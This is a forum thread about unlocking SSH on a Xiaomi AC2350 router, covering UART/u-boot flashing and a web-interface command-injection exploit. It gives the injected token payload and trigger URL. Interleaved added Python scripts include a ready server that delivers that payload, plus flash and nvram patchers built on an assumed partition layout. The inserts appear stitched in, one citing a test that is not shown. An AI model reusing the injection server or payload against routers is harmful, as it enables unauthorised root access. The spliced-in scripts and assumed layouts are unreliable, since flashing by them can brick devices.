Support AIoT AC2350 Xiaomi?

Attaching multiple router logs, hopefully it will help someone.
AC2350 Logs.

Firmware version: 3.0.36.
OpenWRT Invasion script does not work with this router. I guess we need to downgrade firmware somehow.

2 Likes

I got access via SSH on 3.0.36. The method is not simple, but it is quite reproducible. A second access point is required (preferably on OpenWRT, but not necessarily). See https://github.com/acecilia/OpenWRTInvasion/issues/46#issuecomment-753657973
Now I'm interested in how this can help with porting :slight_smile:

2 Likes

dmesg output

2 Likes

UART boot log
U-Boot help message

Upd.: Now I can flash any firmware to check and return the factory state. I hope there is an interested developer here who can start porting using my router for tests.

2 Likes

I am waiting for your answer, and will describe my problem.

I have a Connect Box from UPC as my first router and a Xiaomi AC2350 as my wireless repeater. I have a non-stop problem of losing the connection from the Xiaomi to the Connect Box.

+1. Available settings on this router are so basic.

1 Like

Hello Mr Dobos. :slight_smile: I also have a CB. Try the Xiaomi as the router and use the CB in modem mode.

Important notes:

  1. If you do not follow the instructions described here correctly, you can damage your device!
  2. Capture everything you do in the UART console (for example, in minicom, this is enabled by pressing Ctrl+Z, L). The resulting text files will help me figure out what went wrong and how to restore the device.
  3. If something went wrong, then stop and describe what happened here on the forum, so as not to worsen the situation, but to sort it out together.

Currently, I have found 2 ways to open ssh access.

1 ) Via UART on the board.
This method is easier for those who know how to use a soldering iron. You will need a USB to TTL adapter.

UART pinouts:

4   3   2   1
tx  gnd rx  vcc

I connected to UART without opening the case through the vents.

Connecting the adapter:
RX <---> TX
TX <---> RX
GND <-> GND
Attention! Do not connect the VCC!

I use minicom on Linux and macOS. On Windows you can use PuTTY. The connection speed is 115200. If you have connected everything correctly, a log will be displayed in the terminal program on the computer after restarting the router.

Now we need to make the router think that it is in emergency mode so that it lets us into the u-boot console. Connect the power to the router and turn it off after 5-10 seconds. On the next power-up, the startup will pause for 2 seconds. At this point you should see the message Hit any key to stop autoboot: and a countdown (2..1..0). Press any key during the countdown and you will be taken to the u-boot console. If everything is done correctly, you will see the prompt: ath>.

Next, we will need a TFTP server on the computer. On Linux you can use dnsmasq for this, for example. Copy the following files to the root folder of the TFTP server:

In the u-boot console, run:
tftpboot 0x80060000 rootfs.squashfs.mod
Wait for the message about a successful download (! the size must be equal to cbdd5c !).
Erasing the old rootfs in flash:
erase 0x9f310000 +0xcbdd5c
Flashing a new rootfs:
cp.b 0x80060000 0x9f310000 0xcbdd5c
After copying is complete, restart the router:
reset

To roll back to the original rootfs, do the same, but replace the file name with 310000.squashfs:
tftpboot 0x80060000 310000.squashfs
erase 0x9f310000 +0xcbdd5c
cp.b 0x80060000 0x9f310000 0xcbdd5c
reset

When you first start the ssh server on the router, an RSA key is generated, so the launch will take longer. After about 2 minutes, SSH access should be opened.

2 ) Using a vulnerability exploited through the web interface
This method does not require soldering skills, but requires an additional access point on a controlled firmware (OpenWRT or similar).
Based on Adding OpenWrt support for Xiaomi AX3600

You will need a WiFi AP on which you can respond to HTTP POST requests. Almost any access point or wireless router on an alternative firmware will work.
On a POST request to /cgi-bin/luci/api/xqsystem/token it should answer:
{"code":0,"token":"; nvram set ssh_en=1; nvram commit; sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; /etc/init.d/dropbear start;"}

Also, this access point must have the DHCP server disabled, the wired network disconnected, and the IP address set to 169.254.31.1.

Now we need to log in to the web interface on the hacked router. After that, you need to copy the token to the url (after stok= and before the next slash). Next, insert the following url in the address bar:
http://<router IP>/cgi-bin/luci/;stok=<STOK>/api/xqsystem/extendwifi_connect_inited_router?ssid=ssidname&password=PaSsW0rd&encryption=WPA2PSK&enctype=AES&channel=11&band=2g&admin_username=user&admin_password=pwd&admin_nonce=xxx
<STOK> - token copied from the previous url
ssid, password, encryption, enctype, channel, band - connection parameters to the second WiFi access point
admin_username, admin_password, admin_nonce - ignored, can contain any values

After successful loading of this url, SSH access will be opened. However, without flashing modified rootfs, you will have to go through the described procedure again after each reboot of the router.

You can flash rootfs in the system console of the router with the following commands:
tftp -g -r rootfs.squashfs.mod -l /tmp/rootfs.squashfs.mod <IP address of TFTP server>
Wait for a successful download.
mtd write /tmp/rootfs.squashfs.mod rootfs
After successful flashing, restart the router:
reboot

PS Changes in the modified rootfs:

  • the firmware distribution channel is ignored when the SSH server is started
  • removed overwrite of nvram parameters from bdata
  • the overlay in tmpfs has been replaced with an overlay in the mtd section rootfs_data

UPD Sorry, I forgot to attach the rootfs change diff yesterday. https://gist.github.com/eisaev/bfcabf299a18c9302236afe7c4f69667

3 Likes
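The u-boot sequence in method 1 only works when the erase length and the cp.b length equal the byte count that tftpboot reports; the post hard-codes 0xcbdd5c for its own rootfs.squashfs.mod. The following script is an added example, not the poster's tooling: it derives the three commands from the real image size and checks u-boot's "Bytes transferred = N (hex hex)" line against the file before anything is erased. The load and flash addresses are the ones from the post; the 64 KiB erase block is an assumption (check it with flinfo at the ath> prompt) and is only used to show how far a sector-granular erase really reaches on this memory-mapped NOR flash.

```python
#!/usr/bin/env python3
"""Derive the u-boot commands for method 1 from the real image size.

Added example for this thread, not the poster's own tooling.
Addresses are the ones from the post; ERASE_BLOCK is an assumption.
"""
import os
import re

LOAD_ADDR = 0x80060000          # RAM address used by tftpboot in the post
ROOTFS_FLASH_ADDR = 0x9f310000  # start of the rootfs partition (from the post)
ERASE_BLOCK = 0x10000           # assumption; confirm with 'flinfo' in u-boot

# u-boot's net/tftp.c prints exactly this line after a successful transfer.
_XFER = re.compile(r"Bytes transferred = (\d+) \(([0-9a-f]+) hex\)")


def uboot_commands(filename, size):
    """tftpboot/erase/cp.b/reset lines for an image of `size` bytes."""
    if size <= 0:
        raise ValueError("refusing to generate commands for an empty image")
    return [
        f"tftpboot {LOAD_ADDR:#x} {filename}",
        f"erase {ROOTFS_FLASH_ADDR:#x} +{size:#x}",
        f"cp.b {LOAD_ADDR:#x} {ROOTFS_FLASH_ADDR:#x} {size:#x}",
        "reset",
    ]


def erase_end(size, block=ERASE_BLOCK):
    """Last flash address the erase touches: u-boot erases whole sectors,
    so 'erase start +len' runs to the end of the sector holding start+len-1."""
    blocks = -(-size // block)          # ceiling division
    return ROOTFS_FLASH_ADDR + blocks * block - 1


def transfer_ok(uboot_line, expected_size):
    """True if u-boot's transfer summary matches the file on the TFTP root.
    Flash nothing when this is False: a short transfer flashed with the
    expected length leaves the tail of the old rootfs in place."""
    m = _XFER.search(uboot_line)
    if not m:
        return False
    dec, hx = int(m.group(1)), int(m.group(2), 16)
    return dec == hx == expected_size


def commands_for_file(path):
    """Size taken from the image as it lies in the TFTP root."""
    return uboot_commands(os.path.basename(path), os.path.getsize(path))


if __name__ == "__main__":
    import sys
    print("\n".join(commands_for_file(sys.argv[1])))
```

Run it against the image in the TFTP root, paste the four lines into the ath> console one at a time, and compare the "Bytes transferred" line with transfer_ok before issuing the erase; the same size logic applies to the 310000.squashfs rollback image.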
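Method 2 needs a box on 169.254.31.1 that answers the router's token request with the command-injection payload quoted in the post. The server below is an added example, not eisaev's setup or part of OpenWRTInvasion; it is the smallest thing that does that job with the Python standard library. The JSON body it returns is byte-for-byte the one from the post; the only assumptions are that the target contacts its new upstream on port 80 and that the token is spliced unquoted into a shell command, which is what makes the leading ';' effective.

```python
#!/usr/bin/env python3
"""Stand-in for the 'second access point' used in method 2.

Added example for this thread, not the poster's script. Answers
POST /cgi-bin/luci/api/xqsystem/token with the payload from the post.
"""
import json
from http.server import BaseHTTPRequestHandler, HTTPServer

# Payload from the post: the firmware splices the token into a shell command
# unquoted, so everything after the first ';' runs as root on the router.
PAYLOAD = (
    "; nvram set ssh_en=1; nvram commit; "
    "sed -i 's/channel=.*/channel=\"debug\"/g' /etc/init.d/dropbear; "
    "/etc/init.d/dropbear start;"
)

TOKEN_PATH = "/cgi-bin/luci/api/xqsystem/token"


def token_response(path, method="POST"):
    """(status, body) for a request: only a POST to the token endpoint gets
    the payload, anything else is refused so the box is otherwise inert."""
    if method == "POST" and path.split("?", 1)[0] == TOKEN_PATH:
        body = json.dumps({"code": 0, "token": PAYLOAD}, separators=(",", ":"))
        return 200, body.encode()
    return 404, b"not found"


class Handler(BaseHTTPRequestHandler):
    def _serve(self):
        length = int(self.headers.get("Content-Length") or 0)
        if length:
            self.rfile.read(length)        # drain the body; its content is irrelevant
        status, body = token_response(self.path, self.command)
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
        self.log_message("%s %s -> %d", self.command, self.path, status)

    do_POST = _serve
    do_GET = _serve


if __name__ == "__main__":
    import sys
    # Bind address assumed from the post: the AP must hold 169.254.31.1.
    bind = sys.argv[1] if len(sys.argv) > 1 else "169.254.31.1"
    HTTPServer((bind, 80), Handler).serve_forever()
```

Port 80 needs root (or a capability) on the AP; the other requirements from the post still apply: DHCP server off, no wired uplink, and the AP's address set to 169.254.31.1 before the extendwifi_connect_inited_router URL is loaded on the target.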

Thank you for explaining what to do, but I don't have such an access point to do that.

Csszokolai, thank you for the help, but I need to have the Connect Box in a different room from the one where I have the Xiaomi AC2350, so for me that is impossible.

For me the only solution is for somebody to compile a new ROM with SSH support.

1 Like

Thank you for explaining what to do, but I don't have such an access point to do that.

Only the second method requires an additional access point. The first method requires only a USB2TTL adapter and a steady hand :slight_smile:

For me the only solution is for somebody to compile a new ROM with SSH support.

Unfortunately, this is not possible unless the private key used for signing the firmware leaks. The RSA signature is checked both when flashing via the web interface and when using recovery mode via TFTP.

I have a USB2TTL adapter and have already used it on the Zyxel NSA310, but no soldering, because unfortunately I have neither a soldering iron nor the talent to work with one.
It looks like I will have to replace this router with another one - what would you recommend?

I thought something like this would be a better solution:

For hardware recommendations please open a new topic in the Hardware Questions and Recommendations category of this forum.

Please see https://openwrt.org/faq/which_router_should_i_buy before asking for recommendations. This way you will get better recommendations and come to a quicker solution.

Thank you for all your help - for now I am testing the connection with my WiFi without any special characters, because that may be the solution to my problem with the lost connection.

I just got mine yesterday and it didn't take very long until I wanted to get ssh going.
I opened it up, put a CH341A clamp on the flash and dumped it all with AsProgrammer.
I then edited the few values to enable telnet, ssh and uart using this guide.

Then, happy a bit too soon and feeling safe because I had dumped the flash earlier, I went on to flash the edited bin, also using AsProgrammer.
Sadly it didn't boot and the LEDs glow blue.
Not sure where I went wrong. I had the power disconnected from the router while flashing and let it sit for a minute afterwards before trying to boot.

I obviously tried flashing back the unmodified dump I made, and it still does not boot. I can't figure it out.
I tried using a Xubuntu live USB and flashboot as well, and it reports that it flashed fine, but it still won't boot.

Any pointers would be appreciated. I could also upload the flash if needed.

When you edit parameters in Bdata or in nvram, you need to recalculate the checksum! Otherwise, the parameters from these partitions will not be read by the firmware.
Can you connect to the UART via a USB2TTL adapter? I think the boot log from the UART console could give more information.

1 Like

Aye, rookie mistake by me I guess. I believe the CH341A can do that indeed; I don't have the nice cables to do it, sadly.
Dumb question I'm sure, but can I recalculate it by running the edited bin through a program?
And how come it does not recover when flashing the unedited bin? Shouldn't that match?

To clarify, I edited the dumped .bin using HxD following the first steps from here. https://aisoa.cn/post-3120.html

Aye, rookie mistake by me I guess. I believe the CH341A can do that indeed; I don't have the nice cables to do it, sadly.

I got the CH341A connection to the UART only after applying 3.3V mod (https://www.chucknemeth.com/usb-devices/ch341a/3v-ch341a-mod).

Dumb question I'm sure, but can I recalculate it by running the edited bin through a program?

To edit the dumps of nvram and Bdata partitions, I used a script for AX3600 (https://github.com/odedlaz/ax3600-files/blob/master/scripts/header.py)

And how come it does not recover when flashing the unedited bin? Shouldn't that match?

I think that first of all you need to understand why it is not restored by the unmodified dump. The dump may have been made incorrectly. If you post the dump somewhere, I can check how much it looks like a real dump.

Perhaps after flashing the original dump you just need to reset the settings. To do this, connect the power to the router for 5-10 seconds and turn it off. The next time you connect the power, the router should try to reset to factory settings.

Perhaps it still booted up, but without WiFi. Try connecting to it by wire (the default IP address is 192.168.31.1).

1 Like
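The checksum point from the two replies above (edit a Bdata or nvram value in a hex editor and the firmware silently ignores the whole partition) is easier to see with a patcher that does the job properly. The script below is an added example for this thread; it is not the AX3600 header.py and nothing from the router. Its partition layout is an assumption modelled on what that script handles: a 16-byte header of 'HDR1' magic, little-endian payload length, little-endian CRC32 of the payload and four reserved bytes, followed by NUL-separated key=value pairs and 0xFF padding. Confirm that against your own dump (magic bytes present and the stored checksum verifying) before writing anything back with the programmer; if parse() rejects your dump, the layout differs and the script must not be used on it.

```python
#!/usr/bin/env python3
"""Patch a key in a Bdata/nvram-style partition dump and recompute the CRC.

Added example for this thread, not the AX3600 header.py. The header
layout below is an assumption; verify it against a real dump first.
"""
import struct
import zlib

MAGIC = b"HDR1"
HEADER = struct.Struct("<4sII4s")   # magic, payload length, crc32, reserved


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def parse(blob):
    """Header + checksum check, then key=value pairs as a dict.
    Raises ValueError when the assumed layout does not hold or the
    checksum is stale, which is exactly the state a naive hex edit leaves."""
    magic, length, crc, _ = HEADER.unpack_from(blob, 0)
    if magic != MAGIC:
        raise ValueError(f"bad magic {magic!r}: layout assumption does not hold")
    payload = blob[HEADER.size:HEADER.size + length]
    if len(payload) != length:
        raise ValueError("truncated dump")
    if crc32(payload) != crc:
        raise ValueError("stored checksum does not match payload (edited without recalculating?)")
    params = {}
    for entry in payload.split(b"\x00"):
        if b"=" in entry:
            key, value = entry.split(b"=", 1)
            params[key.decode()] = value.decode()
    return params


def build(params, total_size=None):
    """Serialize params with a fresh header; pad to the partition size with
    0xFF (erased flash) so the image can be written back 1:1."""
    payload = b"".join(f"{k}={v}".encode() + b"\x00" for k, v in params.items()) + b"\x00"
    blob = HEADER.pack(MAGIC, len(payload), crc32(payload), b"\x00" * 4) + payload
    if total_size is not None:
        if len(blob) > total_size:
            raise ValueError("parameters do not fit in the partition")
        blob += b"\xff" * (total_size - len(blob))
    return blob


def set_param(blob, key, value):
    """The correct edit: parse, change one key, rebuild header and checksum."""
    params = parse(blob)
    params[key] = value
    return build(params, len(blob))


if __name__ == "__main__":
    import sys
    src, dst, key, value = sys.argv[1:5]
    with open(src, "rb") as f:
        data = f.read()
    with open(dst, "wb") as f:
        f.write(set_param(data, key, value))
```

Usage: python3 patch.py bdata.bin bdata_ssh.bin ssh_en 1, then write only that partition's range back, not the whole chip. The sample keys in the test (ssh_en, telnet_en, uart_en) are the ones the thread talks about enabling; the dump they sit in is constructed, not taken from a device.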

To clarify, I edited the dumped .bin using HxD following the first steps from here. https://aisoa.cn/post-3120.html

I've seen this manual. It not only ignores the nvram and Bdata checksums, but also does not take into account that on our model the dropbear startup script checks the contents of the /usr/share/xiaoqiang/xiaoqiang_version file in the firmware:

start_service()
{
	# The stable (release) build must not open the ssh service
	flg_ssh=`nvram get ssh_en`
	channel=`/sbin/uci get /usr/share/xiaoqiang/xiaoqiang_version.version.CHANNEL`
	# Both conditions must hold: ssh_en=1 in nvram AND a non-release channel.
	if [ "$flg_ssh" != "1" -o "$channel" = "release" ]; then
		return 0
	fi
	
	# Generate the RSA host key on first start (this is the slow part)
	[ -s /etc/config/dropbear_key/dropbear_rsa_host_key ] || keygen

	. /lib/functions.sh
	. /lib/functions/network.sh

	config_load "${NAME}"
	config_foreach dropbear_instance dropbear
}
1 Like